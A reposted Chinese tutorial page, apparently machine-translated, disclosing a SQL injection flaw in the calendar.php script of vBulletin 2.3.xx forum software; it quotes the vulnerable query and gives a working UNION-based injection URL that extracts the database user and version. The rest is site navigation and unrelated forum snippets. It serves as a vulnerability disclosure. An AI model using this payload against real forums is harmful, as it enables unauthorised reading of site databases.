简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)
首頁 > 後端開發 > php教程 > 主體

vBulletin Forum 2.3.xx SQL Injection_PHP教程

WBOY
發布: 2016-07-21 16:09:26
原創
991 人瀏覽過


vBulletin 論壇 2.3.xx SQL 注入 calendar.php 有sql注入問題。

-------- 截自calendar.php第585行----------
else if ($ action == "編輯")
{
      $eventinfo = $DB_site->query_first("SELECT allowedmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid")
如果MySQL版本大於4.00,則可以使用UNION攻擊。

---------------- -------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12 union (SELECT allowedmilies,public,userid,'0000-0-0',user(),version() FROM calendar_ev
ents WHERE eventid = 13) order by eventdate
---------- ---------------------------- ---

query_first函數只會傳回查詢結果的第一行,所以請確保它回傳!
你想要的那個。

http://www.bkjia.com/PHPjc/314536.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/314536.htmlTechArticlevBulletin論壇2.3.xx SQL注入calendar.php中有sql注入問題。 -------- 從calendar.php 的第585 行剪切---------- else if ($action == "edit") { $eventi...
相關標籤:
sql vbulletin
來源:php.cn
上一篇:第十一節 重載 [11]_PHP教程 下一篇:PHP4之真OO_PHP教程
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
作者最新文章
最新問題
function_exists()無法判定自訂函數 function test()    {        return true;    }    if (function_exists('TEST')) {        ech...
來自於 2024-04-29 11:01:01
0
2
1802
google 瀏覽器 手機版顯示的怎麼實現 老師您好,google 瀏覽器怎麼變成手機版樣式的?
來自於 2024-04-23 00:22:19
0
10
1942
子窗口操作父窗口,輸出沒反應 前兩句可執行,最後一句沒辦法應
來自於 2024-04-19 15:37:47
0
1
1653
父視窗沒有輸出 document.onclick = function(){ window.opener.document.write('我是子視窗的輸出');                  ...
來自於 2024-04-18 23:52:34
0
1
1556
關於CSS心智圖的課件在哪? 課件
來自於 2024-04-16 10:10:18
0
0
1588
相關專題
更多>
熱門推薦
熱門教學
更多>
相關教學
熱門推薦
最新課程
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板
關於我們 免責聲明 Sitemap
PHP中文網:公益線上PHP培訓,幫助PHP學習者快速成長!